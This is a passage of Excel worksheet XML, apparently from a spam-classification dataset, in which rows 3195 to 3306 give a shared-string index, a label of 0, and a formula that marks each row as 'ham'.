    <row r="3195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3195" t="s">
        <v>2612</v>
      </c>
      <c r="B3195">
        <v>0</v>
      </c>
      <c r="C3195" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3196" t="s">
        <v>2613</v>
      </c>
      <c r="B3196">
        <v>0</v>
      </c>
      <c r="C3196" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3197" t="s">
        <v>2614</v>
      </c>
      <c r="B3197">
        <v>0</v>
      </c>
      <c r="C3197" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3198" t="s">
        <v>2615</v>
      </c>
      <c r="B3198">
        <v>0</v>
      </c>
      <c r="C3198" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3199" t="s">
        <v>2616</v>
      </c>
      <c r="B3199">
        <v>0</v>
      </c>
      <c r="C3199" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3200" t="s">
        <v>2617</v>
      </c>
      <c r="B3200">
        <v>0</v>
      </c>
      <c r="C3200" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3201" t="s">
        <v>2618</v>
      </c>
      <c r="B3201">
        <v>0</v>
      </c>
      <c r="C3201" t="str">
        <f t="shared" si="49"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3202" t="s">
        <v>2619</v>
      </c>
      <c r="B3202">
        <v>0</v>
      </c>
      <c r="C3202" t="str">
        <f t="shared" ref="C3202:C3265" si="50">IF(B3202="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3203" t="s">
        <v>2620</v>
      </c>
      <c r="B3203">
        <v>0</v>
      </c>
      <c r="C3203" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3204" t="s">
        <v>2621</v>
      </c>
      <c r="B3204">
        <v>0</v>
      </c>
      <c r="C3204" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3205" t="s">
        <v>2622</v>
      </c>
      <c r="B3205">
        <v>0</v>
      </c>
      <c r="C3205" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3206" t="s">
        <v>2623</v>
      </c>
      <c r="B3206">
        <v>0</v>
      </c>
      <c r="C3206" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3207" t="s">
        <v>2624</v>
      </c>
      <c r="B3207">
        <v>0</v>
      </c>
      <c r="C3207" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3208" t="s">
        <v>2625</v>
      </c>
      <c r="B3208">
        <v>0</v>
      </c>
      <c r="C3208" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3209" t="s">
        <v>2626</v>
      </c>
      <c r="B3209">
        <v>0</v>
      </c>
      <c r="C3209" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3210" t="s">
        <v>2627</v>
      </c>
      <c r="B3210">
        <v>0</v>
      </c>
      <c r="C3210" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3211" t="s">
        <v>21</v>
      </c>
      <c r="B3211">
        <v>0</v>
      </c>
      <c r="C3211" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3212" t="s">
        <v>2628</v>
      </c>
      <c r="B3212">
        <v>0</v>
      </c>
      <c r="C3212" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3213" t="s">
        <v>2629</v>
      </c>
      <c r="B3213">
        <v>0</v>
      </c>
      <c r="C3213" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3214" t="s">
        <v>2630</v>
      </c>
      <c r="B3214">
        <v>0</v>
      </c>
      <c r="C3214" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3215" t="s">
        <v>2631</v>
      </c>
      <c r="B3215">
        <v>0</v>
      </c>
      <c r="C3215" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3216" t="s">
        <v>2632</v>
      </c>
      <c r="B3216">
        <v>0</v>
      </c>
      <c r="C3216" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3217" t="s">
        <v>2633</v>
      </c>
      <c r="B3217">
        <v>0</v>
      </c>
      <c r="C3217" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3218" t="s">
        <v>2634</v>
      </c>
      <c r="B3218">
        <v>0</v>
      </c>
      <c r="C3218" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3219" t="s">
        <v>2635</v>
      </c>
      <c r="B3219">
        <v>0</v>
      </c>
      <c r="C3219" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3220" t="s">
        <v>2636</v>
      </c>
      <c r="B3220">
        <v>0</v>
      </c>
      <c r="C3220" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3221" t="s">
        <v>2637</v>
      </c>
      <c r="B3221">
        <v>0</v>
      </c>
      <c r="C3221" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3222" t="s">
        <v>2638</v>
      </c>
      <c r="B3222">
        <v>0</v>
      </c>
      <c r="C3222" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3223" t="s">
        <v>2639</v>
      </c>
      <c r="B3223">
        <v>0</v>
      </c>
      <c r="C3223" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3224" t="s">
        <v>2640</v>
      </c>
      <c r="B3224">
        <v>0</v>
      </c>
      <c r="C3224" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3225" t="s">
        <v>2641</v>
      </c>
      <c r="B3225">
        <v>0</v>
      </c>
      <c r="C3225" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3226" t="s">
        <v>2642</v>
      </c>
      <c r="B3226">
        <v>0</v>
      </c>
      <c r="C3226" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3227" t="s">
        <v>2643</v>
      </c>
      <c r="B3227">
        <v>0</v>
      </c>
      <c r="C3227" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3228" t="s">
        <v>2644</v>
      </c>
      <c r="B3228">
        <v>0</v>
      </c>
      <c r="C3228" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3229" t="s">
        <v>2645</v>
      </c>
      <c r="B3229">
        <v>0</v>
      </c>
      <c r="C3229" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3230" t="s">
        <v>2646</v>
      </c>
      <c r="B3230">
        <v>0</v>
      </c>
      <c r="C3230" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3231" t="s">
        <v>2647</v>
      </c>
      <c r="B3231">
        <v>0</v>
      </c>
      <c r="C3231" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3232" t="s">
        <v>2648</v>
      </c>
      <c r="B3232">
        <v>0</v>
      </c>
      <c r="C3232" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3233" t="s">
        <v>21</v>
      </c>
      <c r="B3233">
        <v>0</v>
      </c>
      <c r="C3233" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3234" t="s">
        <v>2649</v>
      </c>
      <c r="B3234">
        <v>0</v>
      </c>
      <c r="C3234" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3235" t="s">
        <v>2650</v>
      </c>
      <c r="B3235">
        <v>0</v>
      </c>
      <c r="C3235" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3236" t="s">
        <v>2651</v>
      </c>
      <c r="B3236">
        <v>0</v>
      </c>
      <c r="C3236" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3237" t="s">
        <v>2652</v>
      </c>
      <c r="B3237">
        <v>0</v>
      </c>
      <c r="C3237" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3238" t="s">
        <v>2653</v>
      </c>
      <c r="B3238">
        <v>0</v>
      </c>
      <c r="C3238" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3239" t="s">
        <v>2654</v>
      </c>
      <c r="B3239">
        <v>0</v>
      </c>
      <c r="C3239" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3240" t="s">
        <v>2655</v>
      </c>
      <c r="B3240">
        <v>0</v>
      </c>
      <c r="C3240" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3241" t="s">
        <v>2656</v>
      </c>
      <c r="B3241">
        <v>0</v>
      </c>
      <c r="C3241" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3242" t="s">
        <v>2657</v>
      </c>
      <c r="B3242">
        <v>0</v>
      </c>
      <c r="C3242" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3243" t="s">
        <v>2658</v>
      </c>
      <c r="B3243">
        <v>0</v>
      </c>
      <c r="C3243" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3244" t="s">
        <v>2659</v>
      </c>
      <c r="B3244">
        <v>0</v>
      </c>
      <c r="C3244" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3245" t="s">
        <v>2660</v>
      </c>
      <c r="B3245">
        <v>0</v>
      </c>
      <c r="C3245" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3246" t="s">
        <v>2661</v>
      </c>
      <c r="B3246">
        <v>0</v>
      </c>
      <c r="C3246" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3247" t="s">
        <v>2662</v>
      </c>
      <c r="B3247">
        <v>0</v>
      </c>
      <c r="C3247" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3248" t="s">
        <v>2663</v>
      </c>
      <c r="B3248">
        <v>0</v>
      </c>
      <c r="C3248" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3249" t="s">
        <v>2664</v>
      </c>
      <c r="B3249">
        <v>0</v>
      </c>
      <c r="C3249" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3250" t="s">
        <v>21</v>
      </c>
      <c r="B3250">
        <v>0</v>
      </c>
      <c r="C3250" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3251" t="s">
        <v>2665</v>
      </c>
      <c r="B3251">
        <v>0</v>
      </c>
      <c r="C3251" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3252" t="s">
        <v>2666</v>
      </c>
      <c r="B3252">
        <v>0</v>
      </c>
      <c r="C3252" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3253" t="s">
        <v>2667</v>
      </c>
      <c r="B3253">
        <v>0</v>
      </c>
      <c r="C3253" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3254" t="s">
        <v>2668</v>
      </c>
      <c r="B3254">
        <v>0</v>
      </c>
      <c r="C3254" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3255" t="s">
        <v>21</v>
      </c>
      <c r="B3255">
        <v>0</v>
      </c>
      <c r="C3255" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3256" t="s">
        <v>2669</v>
      </c>
      <c r="B3256">
        <v>0</v>
      </c>
      <c r="C3256" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3257" t="s">
        <v>2670</v>
      </c>
      <c r="B3257">
        <v>0</v>
      </c>
      <c r="C3257" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3258" t="s">
        <v>2671</v>
      </c>
      <c r="B3258">
        <v>0</v>
      </c>
      <c r="C3258" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3259" t="s">
        <v>2672</v>
      </c>
      <c r="B3259">
        <v>0</v>
      </c>
      <c r="C3259" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3260" t="s">
        <v>2673</v>
      </c>
      <c r="B3260">
        <v>0</v>
      </c>
      <c r="C3260" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3261" t="s">
        <v>2674</v>
      </c>
      <c r="B3261">
        <v>0</v>
      </c>
      <c r="C3261" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3262" t="s">
        <v>2675</v>
      </c>
      <c r="B3262">
        <v>0</v>
      </c>
      <c r="C3262" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3263" t="s">
        <v>2676</v>
      </c>
      <c r="B3263">
        <v>0</v>
      </c>
      <c r="C3263" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3264" t="s">
        <v>2677</v>
      </c>
      <c r="B3264">
        <v>0</v>
      </c>
      <c r="C3264" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3265" t="s">
        <v>2678</v>
      </c>
      <c r="B3265">
        <v>0</v>
      </c>
      <c r="C3265" t="str">
        <f t="shared" si="50"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3266" t="s">
        <v>2679</v>
      </c>
      <c r="B3266">
        <v>0</v>
      </c>
      <c r="C3266" t="str">
        <f t="shared" ref="C3266:C3329" si="51">IF(B3266="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="3267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3267" t="s">
        <v>2680</v>
      </c>
      <c r="B3267">
        <v>0</v>
      </c>
      <c r="C3267" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3268" t="s">
        <v>2681</v>
      </c>
      <c r="B3268">
        <v>0</v>
      </c>
      <c r="C3268" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3269" t="s">
        <v>2682</v>
      </c>
      <c r="B3269">
        <v>0</v>
      </c>
      <c r="C3269" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3270" t="s">
        <v>2683</v>
      </c>
      <c r="B3270">
        <v>0</v>
      </c>
      <c r="C3270" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3271" t="s">
        <v>2684</v>
      </c>
      <c r="B3271">
        <v>0</v>
      </c>
      <c r="C3271" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3272" t="s">
        <v>2685</v>
      </c>
      <c r="B3272">
        <v>0</v>
      </c>
      <c r="C3272" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3273" t="s">
        <v>2686</v>
      </c>
      <c r="B3273">
        <v>0</v>
      </c>
      <c r="C3273" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3274" t="s">
        <v>2687</v>
      </c>
      <c r="B3274">
        <v>0</v>
      </c>
      <c r="C3274" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3275" t="s">
        <v>2688</v>
      </c>
      <c r="B3275">
        <v>0</v>
      </c>
      <c r="C3275" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3276" t="s">
        <v>2689</v>
      </c>
      <c r="B3276">
        <v>0</v>
      </c>
      <c r="C3276" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3277" t="s">
        <v>2690</v>
      </c>
      <c r="B3277">
        <v>0</v>
      </c>
      <c r="C3277" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3278" t="s">
        <v>2691</v>
      </c>
      <c r="B3278">
        <v>0</v>
      </c>
      <c r="C3278" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3279" t="s">
        <v>2692</v>
      </c>
      <c r="B3279">
        <v>0</v>
      </c>
      <c r="C3279" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3280" t="s">
        <v>2693</v>
      </c>
      <c r="B3280">
        <v>0</v>
      </c>
      <c r="C3280" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3281" t="s">
        <v>2694</v>
      </c>
      <c r="B3281">
        <v>0</v>
      </c>
      <c r="C3281" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3282" t="s">
        <v>2695</v>
      </c>
      <c r="B3282">
        <v>0</v>
      </c>
      <c r="C3282" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3283" t="s">
        <v>2696</v>
      </c>
      <c r="B3283">
        <v>0</v>
      </c>
      <c r="C3283" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3284" t="s">
        <v>2697</v>
      </c>
      <c r="B3284">
        <v>0</v>
      </c>
      <c r="C3284" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3285" t="s">
        <v>2698</v>
      </c>
      <c r="B3285">
        <v>0</v>
      </c>
      <c r="C3285" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3286" t="s">
        <v>2699</v>
      </c>
      <c r="B3286">
        <v>0</v>
      </c>
      <c r="C3286" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3287" t="s">
        <v>2700</v>
      </c>
      <c r="B3287">
        <v>0</v>
      </c>
      <c r="C3287" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3288" t="s">
        <v>2701</v>
      </c>
      <c r="B3288">
        <v>0</v>
      </c>
      <c r="C3288" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3289" t="s">
        <v>21</v>
      </c>
      <c r="B3289">
        <v>0</v>
      </c>
      <c r="C3289" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3290" t="s">
        <v>2702</v>
      </c>
      <c r="B3290">
        <v>0</v>
      </c>
      <c r="C3290" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3291" t="s">
        <v>2703</v>
      </c>
      <c r="B3291">
        <v>0</v>
      </c>
      <c r="C3291" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3292" t="s">
        <v>2704</v>
      </c>
      <c r="B3292">
        <v>0</v>
      </c>
      <c r="C3292" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3293" t="s">
        <v>2705</v>
      </c>
      <c r="B3293">
        <v>0</v>
      </c>
      <c r="C3293" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3294" t="s">
        <v>21</v>
      </c>
      <c r="B3294">
        <v>0</v>
      </c>
      <c r="C3294" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3295" t="s">
        <v>2706</v>
      </c>
      <c r="B3295">
        <v>0</v>
      </c>
      <c r="C3295" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3296" t="s">
        <v>2707</v>
      </c>
      <c r="B3296">
        <v>0</v>
      </c>
      <c r="C3296" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3297" t="s">
        <v>2708</v>
      </c>
      <c r="B3297">
        <v>0</v>
      </c>
      <c r="C3297" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3298" t="s">
        <v>2709</v>
      </c>
      <c r="B3298">
        <v>0</v>
      </c>
      <c r="C3298" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3299" t="s">
        <v>2710</v>
      </c>
      <c r="B3299">
        <v>0</v>
      </c>
      <c r="C3299" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3300" t="s">
        <v>21</v>
      </c>
      <c r="B3300">
        <v>0</v>
      </c>
      <c r="C3300" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3301" t="s">
        <v>2711</v>
      </c>
      <c r="B3301">
        <v>0</v>
      </c>
      <c r="C3301" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3302" t="s">
        <v>2712</v>
      </c>
      <c r="B3302">
        <v>0</v>
      </c>
      <c r="C3302" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3303" t="s">
        <v>21</v>
      </c>
      <c r="B3303">
        <v>0</v>
      </c>
      <c r="C3303" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3304" t="s">
        <v>2713</v>
      </c>
      <c r="B3304">
        <v>0</v>
      </c>
      <c r="C3304" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3305" t="s">
        <v>2714</v>
      </c>
      <c r="B3305">
        <v>0</v>
      </c>
      <c r="C3305" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3306" t="s">
        <v>2715</v>
      </c>
      <c r="B3306">
        <v>0</v>
      </c>
      <c r="C3306" t="str">
        <f t="shared" si="51"/>
        <v>ham</v>
      </c>
    </row>
    <row r="3307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3307" t="s">
